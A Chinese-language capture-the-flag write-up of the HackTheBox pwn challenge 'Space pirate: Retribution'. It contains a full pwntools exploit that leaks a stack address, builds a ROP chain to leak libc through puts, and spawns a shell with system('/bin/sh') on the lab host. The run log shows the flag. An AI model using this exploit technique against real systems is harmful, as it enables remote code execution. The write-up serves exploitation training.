HackTheBox-Challenges Space pirate: Retribution Writeup

Exploitation

直接來看這題的主邏輯和保護機制：
PIE 有開，有 canary，所以要 leak stack variable 然後 ret2libc

└─$ checksec ./sp_retribution
[*] '/home/kazma/challenge3/sp_retribution'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'

int missile_launcher()
{
  __int64 v1[4]; // [rsp+0h] [rbp-50h] BYREF
  char buf[32]; // [rsp+20h] [rbp-30h] BYREF
  __int64 v3; // [rsp+40h] [rbp-10h]
  __int64 v4; // [rsp+48h] [rbp-8h]

  v4 = 0x53E5854620FB399FLL;
  v3 = 0x576B96B95DF201F9LL;
  printf(
    "\n[*] Current target's coordinates: x = [0x%lx], y = [0x%lx]\n\n[*] Insert new coordinates: x = [0x%lx], y = ",
    0x53E5854620FB399FLL,
    0x576B96B95DF201F9LL,
    0x53E5854620FB399FLL);
  memset(v1, 0, sizeof(v1));
  read(0, buf, 0x1FuLL);
  printf("\n[*] New coordinates: x = [0x53e5854620fb399f], y = %s\n[*] Verify new coordinates? (y/n): ", buf);
  read(0, v1, 0x84uLL);
  return printf(
           "\n%s[-] Permission Denied! You need flag.txt in order to proceed. Coordinates have been reset!%s\n",
           "\x1B[1;31m",
           "\x1B[1;34m");
}

可以看到有兩個明顯的漏洞。
首先是 buf 沒有被初始化，然後又被印出來，所以我們可以嘗試透過覆蓋不同長度的 offset 來找到可以用的 stack address 甚至是 libc address，這部分很多網路上的 writeup 都講錯，漏洞主因是沒有初始化才對。
然後第二個 read 是 bof 應該沒什麼問題，所以我們的目標就是 leak stack address，然後算出 pie base，接著利用 pie base call puts leak got 找 libc base，最後 bof system(‘/bin/sh’)。

Exploit

import warnings

from pwn import *

context.arch = "amd64"
elf = ELF("sp_retribution")
l = ELF("./glibc/libc.so.6")

warnings.filterwarnings("ignore", category=BytesWarning)

# r = process("./sp_retribution")
r = remote("94.237.59.180", 45699)

# Step 1: Find PIE Base
r.sendlineafter(b">> ", "2")
r.sendlineafter(b"[*] Insert new coordinates: x = [0x53e5854620fb399f], y = ", b"a" * 7)
r.recvuntil(b"aaaaaaa\n")
leak = u64(r.recvline().strip().ljust(8, b"\0"))
success("Leaked PIE --> %#0x", leak)
# gdb.attach(r)
base = leak - 3440
success("Find PIE Base --> %#0x", base)

# Step 2: Find Libc Base
rop = ROP(elf)
p = flat(
    b"a" * 0x58,
    base + rop.rdi[0],
    base + elf.got.puts,
    base + elf.plt.puts,
    base + elf.sym.missile_launcher,
)
r.sendlineafter(b"(y/n): ", p)
r.recvuntil(b"reset!")
r.recvline()
puts_got = u64(r.recv(6).ljust(8, b"\0"))
l.address = puts_got - l.sym["puts"]
success("Find libc base --> %#0x", l.address)

# Step 3: system('/bin/sh')
system = l.sym.system
bin_sh = next(l.search("/bin/sh\0"))
p2 = flat(b"a" * 0x58, base + rop.rdi[0], bin_sh, system)
r.sendlineafter(b"new coordinates: x = [0x53e5854620fb399f], y = ", "")
r.sendlineafter(b"(y/n): ", p2)
r.recvuntil(b"reset!")
r.sendline("cat flag.txt")
r.interactive()

執行結果：

└─$ python exploit.py
[*] '/home/kazma/challenge3/sp_retribution'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'./glibc/'
[*] '/home/kazma/challenge3/glibc/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 94.237.59.180 on port 45699: Don[[+] Opening connection to 94.237.59.180 on port 45699: Done[+] Leaked PIE --> 0x5626f6c00d70
[+] Find PIE Base --> 0x5626f6c00000
[*] Loaded 14 cached gadgets for 'sp_retribution'
[+] Find libc base --> 0x7f82e0a13000
[*] Switching to interactive mode

HTB{w3_f1n4lly_m4d3_1t}
[*] Got EOF while reading in interactive
$

Pwned